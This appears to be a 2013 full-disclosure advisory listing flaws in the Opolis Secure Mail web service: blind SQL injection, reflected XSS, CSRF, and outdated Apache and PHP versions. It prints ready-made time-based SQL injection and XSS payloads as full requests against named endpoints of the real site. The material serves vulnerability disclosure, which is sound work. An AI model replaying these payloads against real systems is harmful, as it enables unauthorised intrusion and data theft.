Publish Date: 07 Oct 2013
=========================================================================================================================================================================
OPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text
==========================================================================================================================================================================
TIME-LINE VULNERABILITY
Multiples Advisories
Opolis Secure IT-Services GmbH
Address:Romberggasse 3
1230 Vienna
Austria
E-Mail Contact: helpdesk@opolis.eu<helpdesk@opolis.eu>
BUT
Not Response
THEN
Full Disclosure
I. VULNERABILITY
-------------------------
#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text
#Vendor:http://www.opolis.eu/
#Author:Juan Carlos García (@secnight)
#Follow me
Twitter:@secnight
II. DESCRIPTION
-------------------------
Opolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service.
Opolis re-defines E-Mail with its “Power to the Sender” philosophy: The sender decides if or how E-Mails may be further
processed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions
for internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL.
III. PROOF OF CONCEPT
-------------------------
Blind SQL Injection
********************
Vulnerability description
-------------------------
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and
doesn't properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
Affected items
----------------
/createOpolisWorkGroup/createOpolisWorkGroupStep5.php
URL encoded POST input checkedemail was set to 1';select pg_sleep(2); --
POST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php
aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect
%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc
/slimstat/stats_js.php
"ttl"
URL encoded GET input "ttl" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK
(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version
%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version
%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%
"url"
URL encoded GET input "url" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK
(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR
%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR
%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f
Cross site scripting ( 67 )
*********************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser.
Affected items
----------------
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2)
URL encoded POST input OSMLogInNam was set to hkmohkhr_974672"():;934304
POST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php
checkloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2)
URL encoded POST input currentEmail was set to sample%40email.tst_940309"():;974560
POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php
currentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl
/OpolisSignUp/OpolisSignUpStep1a.php (2)
URL encoded POST input OSMLogInNam was set to etomstqd_911786"():;974637
POST /OpolisSignUp/OpolisSignUpStep1a.php
checkloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637
/OpolisSignUp/OpolisSignUpStep2a.php
URL encoded POST input currentEmail was set to sample%40email.tst_928249"():;986211
The input is reflected inside <script> tag between double quotes.
POST /OpolisSignUp/OpolisSignUpStep2a.php
currentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3)
URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(939864) bad="
POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php
checkedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield=
/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5)
URL encoded POST input checkedemail was set to 1" onmouseover=prompt(911118) bad="
POST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php
checkedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield
POST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5)
URL encoded POST input checkedemail was set to 1" onmouseover=prompt(967963) bad="
checkedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst
/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52)
URL encoded POST input aicountry was set to Antarctica'"()&%<ScRiPt >prompt(973546)</ScRiPt>
aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt
%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp
/OpolisSignUp/OpolisSignUpStep2a.php. (3)
URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(994853) bad="
checkedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield=
/OpolisSignUp/OpolisSignUpStep3a.php. (5)
URL encoded POST input checkedemail was set to 1" onmouseover=prompt(935016) bad="
checkedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield=
Cross Site Request Forgery CSRF (12)
*******************************
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
Affected items
---------------
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0)
/createOpolisWorkGroup/createOpolisWorkGroupStep3.php
/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d)
/OpolisSignUp/OpolisSignUpStep1a.php
/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0)
/OpolisSignUp/OpolisSignUpStep3a.php
/slimstat (9200b13decfada22b75676834e865e65)
The impact of this vulnerability
---------------------------------
An attacker may force the users of a web application to execute actions of the attacker's choosing.
A successful CSRF exploit can compromise end user data and operation in case of normal user.
If the targeted end user is the administrator account, this can compromise the entire web application.
Two examples ( too much security flaws .. )
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2)
Attack details
----------------
Form name: OSMSignUp
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php
Form method: POST
Form inputs:
checkloginname [Hidden]
OSMLogInNam [Text]
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0).
Attack details
-----------------
Form name: OSMSignUp
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php
Form method: POST
Form inputs:
showcheckedloginname [Text]
currentEmail [Text]
POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php
checkedloginname=&showEmailfield=
Apache httpd Remote D.O.S (2)
**************************
Vulnerability description
-------------------------------
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server:
http://seclists.org/fulldisclosure/2011/Aug/175
An attack tool is circulating in the wild. Active use of this tools has been observed.
The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.
Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).
How to fix this vulnerability
----------------------------
Upgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site.
Web references
--------------
CVE-2011-3192
Apache HTTPD Security ADVISORY
Apache HTTP Server 2.2.20 Released
Apache httpd Remote Denial of Service (memory exhaustion)
Apache httpOnly cookie disclosure
**********************************
Vulnerability description
----------------------------
Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors
involving a (1) long or (2) malformed header in conjunction with crafted web script.
Affected Apache versions (up to 2.0.21).
The impact of this vulnerability
-------------------------------
Information disclosure.
How to fix this vulnerability
------------------------------
Upgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue.
Web references
---------------
Fixed in Apache httpd 2.2.22
Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
PHP hangs on parsing particular strings as floating point number (2)
*****************************************************************
PHP hangs when parsing '2.2250738585072011e-308' string as a floating point number.
Current version is : PHP/5.3.1
Affected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17
Affected items
---------------
Web Server
The impact of this vulnerability
----------------------------------
Denial of service attack
How to fix this vulnerability
-------------------------------
Upgrade PHP to the latest version.
Web references
-----------------
PHP Hangs On Numeric Value 2.2250738585072011e-308
PHP Homepage
User credentials are sent in clear text
*****************************************
Vulnerability description
---------------------------
User credentials are transmitted over an unencrypted channel.
This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users.
Affected items
--------------
/slimstat (9200b13decfada22b75676834e865e65)
The impact of this vulnerability
----------------------------------
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
How to fix this vulnerability
-------------------------------
Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS).
IV. BUSINESS IMPACT
-------------------------
( No Comments... )
V SOLUTION
------------------------
Very easy and I don´t understand... WRITE SECURE CODE P L E A S E !!
VI. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Carlos García(@secnight)
VII. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
<p>
Vulmon